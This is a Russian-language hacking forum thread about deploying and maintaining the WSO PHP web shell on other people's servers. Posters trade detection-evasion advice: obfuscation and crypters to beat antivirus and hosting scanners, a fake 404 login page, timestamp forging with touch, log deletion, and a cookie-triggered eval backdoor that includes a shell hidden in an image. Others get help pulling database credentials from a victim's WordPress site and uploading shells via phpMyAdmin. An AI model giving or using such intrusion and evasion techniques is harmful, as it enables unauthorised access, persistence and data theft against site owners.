Почему не выводится переменная $a в wso "Execution PHP-code"?


$a = 1;

function test() {
global $a;

echo 'out: ' . $a;
}

test();

Вывод:


out:

// Решение

PHP code execution выполняется не в глобальном пространстве имен, а в функции и по этому применение global не допустимо.

защитить web php shell

как можно сделать что бы на шелл не реагировали антивирусы и при этом он ещё функционировал на хостинге?

например касперский на WSO шелл реагирует как на вирус backdoor

https://pp.vk.me/c625621/v625621076/1d9b6/BIufdcl0_kU.jpg

а ведь на хостингах могут провести сканирование, и найти файлик можно же.

как защитить файл шела от нахождения? а в часности антивирусом?

ещё один вопрос - а можно ли изменить дату заливки файлов ? как например через total commander делаеся

а то по дате загрузки видно что недавно загружалось.

ещё почемуто wso не архивирует файлы с папками, хотя версия 2.5, нужно слить самописный скрипт

как можно сделать что бы на шелл не реагировали антивирусы и при этом он ещё функционировал на хостинге?
например касперский на WSO шелл реагирует как на вирус backdoor
https://pp.vk.me/c625621/v625621076/1d9b6/BIufdcl0_kU.jpg
а ведь на хостингах могут провести сканирование, и найти файлик можно же.
как защитить файл шела от нахождения? а в часности антивирусом?
ещё один вопрос - а можно ли изменить дату заливки файлов ? как например через total commander делаеся
а то по дате загрузки видно что недавно загружалось.
ещё почемуто wso не архивирует файлы с папками, хотя версия 2.5, нужно слить самописный скрипт


Используй pas.

для изменения даты используйте touch

Используй pas.


Спасибо!

а в нём пароль в дальнейшем нельзя сменить ?

Спасибо!
а в нём пароль в дальнейшем нельзя сменить ?


Можно, если деобфусцировать.

Спасибо!
а в нём пароль в дальнейшем нельзя сменить ?


можно на официально странице создания шелла установить свой пароль

http://profexer.name/pas/download.php

Как узать, в какую папку на сервере, заливаеться WSO?

Как узать, в какую папку на сервере, заливаеться WSO?


для этого нужно запустить wso

для этого нужно запустить wso


Помогите разобраться, как его запустить? Тоесть, закинуть php файл на сервер и все?

Может есть какие то сылки на видео или статью. Потому что я ищу, но толком как с ним работать не нашел

Помогите разобраться, как его запустить? Тоесть, закинуть php файл на сервер и все?
Может есть какие то сылки на видео или статью. Потому что я ищу, но толком как с ним работать не нашел


да, закинуть и открыть

да, закинуть и открыть


А как узнать, в какую папку он попал?я незнаю куда он заливаеться?просто, когда хочу открить, то начинаеться его скачиванье, но как открить, что б он обработался и заработал?в базе, нет ничего, о пути к файлу. Можно, узнать, как то, без брут форсу?

А как узнать, в какую папку он попал?я незнаю куда он заливаеться?в базе, нет ничего, о пути к файлу. Можно, узнать, как то, без брут форсу?


поэтому хэккеров сейчас не так много. папки надо искать, языки какие-то учить..

попробуйте другими способами, либо брутфорс. может найдете читалку файлов на сервере и посмотрите, куда все загружается

поэтому хэккеров сейчас не так много. папки надо искать, языки какие-то учить..
попробуйте другими способами, либо брутфорс. может найдете читалку файлов на сервере и посмотрите, куда все загружается


Понял, спасибо

Мне нужно через WSO2 скачать папку с сервера.

Я пробовал выделять папку и нажимать compress, чтобы заархивировать папку - но никакого архива рядом с папкой не появляется. Как можно скачать всю папку?

Мне нужно через WSO2 скачать папку с сервера.
Я пробовал выделять папку и нажимать compress, чтобы заархивировать папку - но никакого архива рядом с папкой не появляется. Как можно скачать всю папку?


а после, в выпадающем меню, где выбирали за архивировать, появляется строчка Paste, ее нужно клацнуть!

Выбираю compress (пробовал и zip и tar.gz)

Появляется строка с именем файла:

wso_20150321_184812.zip

Жму на кнопку >>

Потом в выпадающем меню появляется Paste - выбираю, жму на кнопку >>.

Ничего не происходит, архив не появляется.

Выбираю compress (пробовал и zip и tar.gz)
Появляется строка с именем файла:
wso_20150321_184812.zip
Жму на кнопку >>
Потом в выпадающем меню появляется Paste - выбираю, жму на кнопку >>.
Ничего не происходит, архив не появляется.


при этой строке, там же где была кнопка compress в выпадающем меню, появляется новая строчка Paste, ее обязательно надо указать, а потом щелкайте по кнопе>>

http://s15.postimg.org/tgk9xqc4b/image.png

при этой строке, там же где была кнопка compress в выпадающем меню, появляется новая строчка
Paste
, ее обязательно надо указать, а потом щелкайте по кнопе
>>
http://s15.postimg.org/tgk9xqc4b/image.png


Премного благодарен.

Делаем мультиаплоад в шелле. Выложил на Rdot, дублирую также сюда:

http://picabox.net/uploads/2014/534.png

http://picabox.net/uploads/2014/535.png

Правим input аплоада


Upload file:$is_writable
>'>


Далее строка примерно 522


case'uploadFile':
...
.....
break;

Заменяем там блок на


case'uploadFile':
if (is_array($_FILES['f']['tmp_name']) ) {
foreach ($_FILES['f']['tmp_name'] as$i=>$tmpName) {
if (!@move_uploaded_file($tmpName,$_FILES['f']['name'][$i])) {
echo"Can't upload file!";
}
}
}
break;

Некий WSO 2.6 кому сильно надо.

http://pastebin.com/Xneg3zJu

↑ (https://antichat.live/posts/3845402/)
Некий WSO 2.6 кому сильно надо.
http://pastebin.com/Xneg3zJu


написали бы в чем отличия

в присутствии бэкдора, пологаю

https://code.google.com/p/wso-web-shell-2-8/

Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.

А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.

Или это противоречит политике GitHub?

↑ (https://antichat.live/posts/3866672/)
https://code.google.com/p/wso-web-shell-2-8/
Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.
А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.
Или это противоречит политике GitHub?


Запустил WSO2.8_undetectable.php на локалхосте с SMTP-заглушкой.

Скриптом отправляется 2 письма на следующие адреса:

fwrite@live.ca (mailto:fwrite@live.ca), f3d0s3rv3r@hotmail.com (mailto:f3d0s3rv3r@hotmail.com)

.SpoilerTarget" type="button">Spoiler: Письмо 1
X-Sendmail-Cmdline: sendmail.pl -t -i

To: fwrite@live.ca (mailto:fwrite@live.ca)

Subject: array localhost/WSO2.8_undetectable.php

X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code

localhost/WSO2.8_undetectable.php

.SpoilerTarget" type="button">Spoiler: Письмо 2
X-Sendmail-Cmdline: sendmail.pl -t -i

To: f3d0s3rv3r@hotmail.com (mailto:f3d0s3rv3r@hotmail.com)

Subject: WebShell http://localhost/WSO2.8_undetectable.php by 127.0.0.1

X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code(276) : eval()'d code(1) : eval()'d code

Bug: localhost/WSO2.8_undetectable.php by 127.0.0.1

Кто-нибудь вообще криптует/минифицирует/обфусцирует WSO2?

Есть в этом смысл вообще? Или современные антивирусы имеют интерпретатор PHP?

Смысл имеет! У меня к примеру сейчас, есть вариант который не один ав не палит, что позволяет дольше быть незамеченным на хостинге. ручками все делал, хочу свой оббусификатор написать но ручки пока не доходят, вариант на 50% сырой еще.

↑ (https://antichat.live/posts/3870172/)
https://github.com/HARDLINUX/webshell
Новый WebShell 2015 года, если кто шарит помогайте улучшать
https://camo.githubusercontent.com/c0f20439c2c91ae4af524e5d9fc8987d20aec720/68747470733a2f2f70702e766b2e6d652f633632353633312f 763632353633313430302f34323263622f537844426f48334b 6a36732e6a7067


И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?

↑ (https://antichat.live/posts/3870172/)
https://github.com/HARDLINUX/webshell
Новый WebShell 2015 года, если кто шарит помогайте улучшать
https://camo.githubusercontent.com/c0f20439c2c91ae4af524e5d9fc8987d20aec720/68747470733a2f2f70702e766b2e6d652f633632353633312f 763632353633313430302f34323263622f537844426f48334b 6a36732e6a7067


Сделай описание что нового ты добавил в эту версию.

↑ (https://antichat.live/posts/3870234/)
И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?


Он ничего не добавил, самое смешное смотреть за историей правок файла. Кстати за основу был взят wso 2.1 этот хакир видимо не знает даже происхождение шелла и что есть 2.5 версия. Во всем виноваты каникулы.

1)


-/* WSO 2.1 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by oRb) */

2)


-/* WSO 2.2.0 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by Pirat) */

3)


-/* WSO 2.2.0 (Web Shell by Pirat) */
+/* WSO 2.2.0 (Web Shell by HARD _LINUX) */

4)


-$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin

5)


-$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3";

PS Для чего была вставлена строка?


$millink='
https://github.com/HARDLINUX/webshell/search?utf8=✓&q=';

↑ (https://antichat.live/posts/3870481/)
усвершенствованая функция скрытия
Жмем на 80 ,появляется окно ввода пароля
http://snag.gy/wLCnQ.jpg
код

function wsoLogin() {
die("
404 Not Found

Not Found
The requested URL index.php was not found on this server.

Apache/2.2.22 (Linux) Server at Port 80
Password: >'>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) wsoLogin();
}



как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл

↑ (https://antichat.live/posts/3870485/)
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл


Отличая идея,что-то не подумал сразу.

↑ (https://antichat.live/posts/3870485/)
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл




↑ (https://antichat.live/posts/3870491/)
Отличая идея,что-то не подумал сразу.


И палить шелл GET-ом, а про cookie, user-agent, accept-language и т.п. уже забыли.

http://kronus.me/cn/wso-builder/1.04/

понравилась онлайн версия билдера wso

возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)

и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!

↑ (https://antichat.live/posts/3870485/)
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл


можно браузер чекать по useragent - а его рандомно сделать и грузить через useragent switcher + проверка по Ip если потребуется - мне эти способы нравятся, самое хреновое если админ видет что туда обращение идёт через логи

в логах видно что идут запросы, но если сайт крупный и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться, но я удаляю файлы логов

на крупных ресурсах как раз мониторят на фронтах еррор логи от бек эндов, и когда отдается тот же 404 больше шансов что заметят, чем 200 ок

↑ (https://antichat.live/posts/3870569/)
самое хреновое если админ видет что туда обращение идёт через логи
***
и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться


Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа


***
$logout=base64_decode($_COOKIE['logout']);
***
if (isset($_COOKIE['logout']))
{@die(eval($logout));}


поправить время через touch (https://ru.wikipedia.org/wiki/Touch), залить jpeg-шелл в аватарки/etc и печеньку подсунуть


logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy9 1c2VyLmpwZyIpOw==

Вариантов много, лиж бы фантазии хватило.

↑ (https://antichat.live/posts/3870567/)
http://kronus.me/cn/wso-builder/1.04/
понравилась онлайн версия билдера wso
возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)
и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!


Там же есть описание http://kronus.me/2012/07/wso-builder-v1-04/ и ссылка для скачивания http://kronus.me/wp-content/uploads/2012/07/builder_v1.042.zip так то любопытный конструктор

а что за файлы в билдере такие с расширением .inc?

↑ (https://antichat.live/posts/3871130/)
а что за файлы в билдере такие с расширением .inc?


А догадайся с трёх раз

↑ (https://antichat.live/posts/3871130/)
а что за файлы в билдере такие с расширением .inc?


.inc include библиотеки с функциями или любые другие подключаемые файлы.

могли бы помочь в разработке, а не критиковать.


Смысл? Я им не пользуюсь. В свое время я помогал автору шела. Сейчас я помогаю по возможности другому автору другого шела.

Какие есть предложения? Что именно ты хочешь сделать, какие есть замечания и самый главный вопрос чем эта версия лучше последней?


ссылку на git надо заменить, пока не нашел нормальной базы эксплойтов.


А может её вообще убрать лучше? По мне так только идиот с шела будет переходить по внешним ссылкам оставляя реферер да вообще данного рода поиск не точный потому как берется полная фраза для поиска а по сути важен только год а не версия ядра с включенным именем хоста.

↑ (https://antichat.live/posts/3871130/)
а что за файлы в билдере такие с расширением .inc?


Сокращение от include, так обычно обзывают библиотеки с функциями или любые другие подключаемые файлы.

так обычно обзывают библиотеки


А еще так обычно находят исходники на сайте, изучают и хекают потом )

заметил что шеллы переодически удаляются, возможно где то спрятан скрипт который отслеживает появление новых файлов на хостинге

прячу и в картинку и в txt но всё равно шелы исчезают

как можно ещё спрятать ? скрипт палящий не нашёл, файлов много, сайт на битриксе

wso зашифрованный, логи я удаляю после завершения входа

добавил вывод ошибок.


всмысле? error_reporting включил?

Я ничего не понял ты можешь выражаться ясно? ты добавил перенаправление 2>&1 для консоли или просто включил error_reporting если второе ты ты дибил однозначно

исправил некоторые баги


Перечень багов пожалуйста сюда списком.


Преимущества этого webshell в том что он не палица


Не палится чем именно, список.


и находит уязвимость в некоторых хостингах


Смысл? Я считаю это уже нужно самому проверять а не увеличивать размер шела таким бесполезным функционалом который не каждый использует. Как по мне я бы даже вырезал несколько моментов из шела за ненадобностью тем самым сократив код.

↑ (https://antichat.live/posts/3871312/)
это ты больной на голову, скачай посмотри, хули как телка ломаешься


Вангую что ты сегодня последний день на форуме)))

Ты внатуре даун что ли, я ему пишу выложи дифф правок или хотя бы опиши что ты сделал а он мне "скачай посмотри" что посмотреть? Ты думаешь мне интересно делать дифф старой версии шела с твоей версией чтоб посмотреть что ты там натворил? Судя по тому что ты включил вывод ошибок error_reporting ты уже показал что ты идиот который не знает что делает и зачем. По поводу перенаправления 2>&1 ясен хрен не нужно его делать, ну разве что ты хочешь упороть шелл окончательно то делай. Чтоб ты дурачек знал многие люди специально делают перенаправление буфера ошибок в /dev/null чтоб не видеть лишней инфы, а ты сейчас предлагаешь её обьеденить с буфером вывода.

В общем я не буду больше ничего писать потому как с каждым твоим ответом я все больше убеждаюсь что ты очередной нарисовавшийся вася на время каникул решил тут херни натворить. И все таки не понимаю как это палился и теперь не палиться, чем ты это можешь подтвердить и как я могу это перепроверить? Не палиться что ли антивирусом clamav? Так напиши по русски или чем не палиться я понять не могу. Качать это УГ есесно не буду. В общем удачи, я смотрю критику ты не воспринимаешь и явных овтетов не даешь, все упирается в "скачай посмотри"

админ хитрый, мониторит файлы на наличие новых файлов на сервере + предыдущий файл снёс и запретил входить в админку всем подрят

но есть доступ к базе через phpmyadmin

войти в админку сайта не получается - стоит блок - разрешает определённым ip или юзерагентам (bitrix)

можно ли через phpmyadmin залить шелл ? что то пробовал как по этому видео

но мини шелл не работает - не выводит phpinfo

скину в лс логин/pass от sql, помогите пожалуйста

↑ (https://antichat.live/posts/3872008/)
скину в лс логин/pass от sql, помогите пожалуйста


Ты темой ошибся и скинь в лс.

на хостинге не пошло

Forbidden: a malicious file has been detected.

Detected as: PHP.Shell-38

печалька

а не подскажете как базу ломануть сим превосходным инструментом?

↑ (https://antichat.live/posts/3873473/)
а не подскажете как базу ломануть сим превосходным инструментом?


Базу вы "сим превосходным инструментом" ни как не взломаете, если только имеете логин, пароль, удаленый хост и название БД!

при условии что шел ужу лежит на хосте жертвы.

↑ (https://antichat.live/posts/3873473/)
а не подскажете как базу ломануть сим превосходным инструментом?


сим превосходным инструментом вы можете слить файл конфиги с паролем, логином и хостом базы (например от вордпресса или джумалы) при условии что вы сможете залить этот шелл на сервер

так вот в том то и фошка что шел у жертвы а жертва умная попалась конфиги WP позапрятал так что я не могу пути отследить. а у него там сайтик как раз как мне нужно лежит хотел его весь стянуть файлы выгрузил а к бызе подобратся на получается. Оно конечно можно заморочится и найти эти конфигиЮ но просто интересно было может шел может както подобратся к базе быстрее меня. Пробовал вывести на страницу все содержимое $wpdb но по тем логин паролю что получил почему то шел в базу не пускает. Может подскажет кто, навенрняка есть какойнибудь готовый скриптик чтоб его в код внедрить и сделать дамп БД

↑ (https://antichat.live/posts/3873576/)
так вот в том то и фошка что шел у жертвы а жертва умная попалась конфиги WP позапрятал так что я не могу пути отследить. а у него там сайтик как раз как мне нужно лежит хотел его весь стянуть файлы выгрузил а к бызе подобратся на получается. Оно конечно можно заморочится и найти эти конфигиЮ но просто интересно было может шел может както подобратся к базе быстрее меня. Пробовал вывести на страницу все содержимое $wpdb но по тем логин паролю что получил почему то шел в базу не пускает. Может подскажет кто, навенрняка есть какойнибудь готовый скриптик чтоб его в код внедрить и сделать дамп БД


таких скриптов не знаю, ищи wp-config.php в корне сайта или скачай все файлы и тотал командером сделай поиск файлов в которых содержится текст: DB_PASSWORD

не могу понять как ты смог залить шелл на хост и не можешь найти конфиг файл

да в том то и дело что в конфиче нет пароля к бд либо он зашифрован вот содержимое конфига

[PHP]
[COLOR="#0000BB"]uY+vh|~P93-nfaS,RrC7G2%C^x4?');
define('NONCE_SALT', '}Avp[COLOR="#007700"]

я не силен во всякого рода шифровании но я так понимаю что тут

[PHP]
[COLOR="#0000BB"]uY+vh|~P93-nfaS,RrC7G2%C^x4?');
define('NONCE_SALT', '}Avp[COLOR="#007700"]

может он и был в файле wp-config.php , но бывают случаи когда файл отображается не полностью,то в в шелле нажми на Highlight и отобразится пасс

У меня вчера на 3 сервантах такое было

↑ (https://antichat.live/posts/3873715/)
может он и был в файле wp-config.php , но бывают случаи когда файл отображается не полностью,то в в шелле нажми на Highlight и отобразится пасс
У меня вчера на 3 сервантах такое было


внатуре сработало. чувак где ты раньше был я уже два дня этот сайт штурмом взять пытаюс. спасибо

только вот Access denied for user '*****'@'localhost' (using password: YES) такая беда

а не все в порядке просто что то заглючило залогинился в шеле заново и пустило

Всегда рад помочь))

↑ (https://antichat.live/posts/3873715/)
может он и был в файле wp-config.php , но бывают случаи когда файл отображается не полностью,то в в шелле нажми на Highlight и отобразится пасс
У меня вчера на 3 сервантах такое было


Это в оригинальном шеле такой бок или в кривых форках?

В оригинальном,качал с рдота

↑ (https://antichat.live/posts/3875169/)
Это в оригинальном шеле такой бок или в кривых форках?


пробовал два варика оригинал и какойто форк в обоих случаях такая хрень была

Кто знает какие есть веб шеллы написанные на Python?

↑ (https://antichat.live/posts/3875266/)
Кто знает какие есть веб шеллы написанные на Python?


wso2. https://rdot.org/forum/showthread.php?t=147

↑ (https://antichat.live/posts/3875262/)
пробовал два варика оригинал и какойто форк в обоих случаях такая хрень была


https://rdot.org/forum/showthread.php?t=1567 попробуй этим открыть, просто ради интереса будет такой баг или нет. Если будет я исправлю в обеих шелах

↑ (https://antichat.live/posts/3875382/)
https://rdot.org/forum/showthread.php?t=1567
попробуй этим открыть, просто ради интереса будет такой баг или нет. Если будет я исправлю в обеих шелах


Нет,баг только в wso

↑ (https://antichat.live/posts/3875437/)
Нет,баг только в wso


Значит подозреваю что аналогичный этому багу баг https://rdot.org/forum/showpost.php?p=38748&postcount=120

Да,так оно и есть

а можно ли шеллы запускать из архива с паролем ? шелл как бы в контейнере с паролем но работает при правильном пароле ?

ps стандарнтые способы как то обнаруживают - хоть и зашифрован, но чем обнаруживают ? может ли это быть скрипт который смотрит появление новых файлов на хосте ? а как этот скрипт способы есть найти и удалить, а потом шелл ставить ?

Спасибо

↑ (https://antichat.live/posts/3875638/)
а можно ли шеллы запускать из архива с паролем ? шелл как бы в контейнере с паролем но работает при правильном пароле ?
ps стандарнтые способы как то обнаруживают - хоть и зашифрован, но чем обнаруживают ? может ли это быть скрипт который смотрит появление новых файлов на хосте ? а как этот скрипт способы есть найти и удалить, а потом шелл ставить ?


чувак ты вообще понимаешь как работает php и тот же бекэнд? если есть рут доступ, можно написать такой мега изврат, но это тупо

по твоему вопросу, попробуй залить обычный файл, не шелл, а тот же пхпинфо или ещё какую-то беспаливную хрень, если запалят/удалят, значит действительно чекаеют диры и сравнивают хеш суммы

P.s. ну и посты тут встречаются, школота добралась до хака эх, хорошо хоть каникулы у них скоро закончатся

[QUOTE = "CodeHunter, должность: 3872225, член: 268122"] на хостинге не пошло

Запрещено: вредоносный файл был обнаружен.

Определен как: PHP.Shell-38

печалька [/ QUOTE]

Этот попробуй

https://github.com/HARDLINUX/webshell

Или воспользуйся еще этим http://fopo.com.ar/

↑ (https://antichat.live/posts/3880405/)
можно написать такой мега изврат, но это тупо


Это не тупо, изврат полезен, взять ту же обфускацию? Шелл в том же zend не пробовал?

а что за шифрование используется в wso билдере ?

на хостинге отключили ftp, хотел wso поставить сделал в билдере только файловый менеджер - хоть он и зашифрован, но его палит хостинг

Forbidden: a malicious file has been detected.

Detected as: PHP.Shell-38

как сделать что бы обходил палево ?

шел то с паролем, + проверяет доступ к нему по кукам, ip и юзерагенту вместе

↑ (https://antichat.live/posts/3884584/)
на хостинге отключили ftp, хотел wso поставить сделал в билдере только файловый менеджер - хоть он и зашифрован, но его палит хостинг
Forbidden: a malicious file has been detected.
Detected as: PHP.Shell-38
как сделать что бы обходил палево ?


Сменить сигнатуру шифрования/оббуссифекации, или попросить тех кто умеет это если не можете сами...


↑ (https://antichat.live/posts/3880777/)
Это не тупо, изврат полезен, взять ту же обфускацию? Шелл в том же zend не пробовал?


zend сильно в глаза бросается при выявлении шелла на площадке


↑ (https://antichat.live/posts/3875638/)
а можно ли шеллы запускать из архива с паролем ? шелл как бы в контейнере с паролем но работает при правильном пароле ?


Можно использовать свою функцию, которая будет декриптовать шелл, скажем по ключу из сессии, естественно и упаковщик под него надо писать, где и будет задаваться ключ для декриптора, также можно сделать так чтоб распаковывался и сам архив с заданным паролем, но тут нужно выполнение системных команд, которые включены не везде...


↑ (https://antichat.live/posts/3881050/)
а что за шифрование используется в wso билдере ?


Стандартные упаковщики, которые палится всем чем можно!

↑ (https://antichat.live/posts/3875638/)
а можно ли шеллы запускать из архива с паролем ? шелл как бы в контейнере с паролем но работает при правильном пароле ?
ps стандарнтые способы как то обнаруживают - хоть и зашифрован, но чем обнаруживают ? может ли это быть скрипт который смотрит появление новых файлов на хосте ? а как этот скрипт способы есть найти и удалить, а потом шелл ставить ?


Заархивировать в PHP нельзя. Ну по крайней мере до 5,5 включительно. Про PHP 7 не знаю, но скорее всего и там нельзя. То есть функции архивации там есть, но работают они только с данными. То что разорхивировано запустить в памяти нельзя, только создавать новый хайл и его запускать. По поводу детекта ниже.


↑ (https://antichat.live/posts/3884584/)
на хостинге отключили ftp, хотел wso поставить сделал в билдере только файловый менеджер - хоть он и зашифрован, но его палит хостинг
Forbidden: a malicious file has been detected.
Detected as: PHP.Shell-38
как сделать что бы обходил палево ?


Для детекта на хостингах обычно используются два основных метода.

1. Мод секюрити с обвесом, его можно обходить без особого труда, т.к. там обычный сигнатурный анализ

2. DrWeb, его увы не обойдешь никак. Он использует для анализа песочницу, где запускает файл и после его декрипта анализирует. Ловит по наличию опасных функций и кусков кода, обойти его нельзя.

↑ (https://antichat.live/posts/3884584/)
как сделать что бы обходил палево ?


Попробуй https://github.com/epinna/weevely3

↑ (https://antichat.live/posts/3887130/)
Заархивировать в PHP нельзя. Ну по крайней мере до 5,5 включительно.


Архивы поддерживаются давно, но через врапперы, а начиная с версии 5.3 архив phar можно поместить непосредственно в файл php.

Wso без проблем работает в таком архиве.

спасибо

появилась возможность разместиь шелл с сайтом на wordpress, но хостинг http://www.hostinger.ru (http://www.hostinger.ru/) блокирует wso шелл, даже зашифрованый + запароленый, после ввода пароля пишет Forbidden: a malicious file has been detected. Detected as: PHP.Shell-38

есть ли билдеры - которые нормально шифруют шелл, что бы тот не обнаруживался хостингом ?

↑ (https://antichat.live/posts/3891736/)
появилась возможность разместиь шелл с сайтом на wordpress, но хостинг
http://www.hostinger.ru (http://www.hostinger.ru/)
блокирует wso шелл, даже зашифрованый + запароленый, после ввода пароля пишет Forbidden: a malicious file has been detected. Detected as: PHP.Shell-38
есть ли билдеры - которые нормально шифруют шелл, что бы тот не обнаруживался хостингом ?


Могу попробовать своим криптором пройтись в рамках интереса, пиши в аську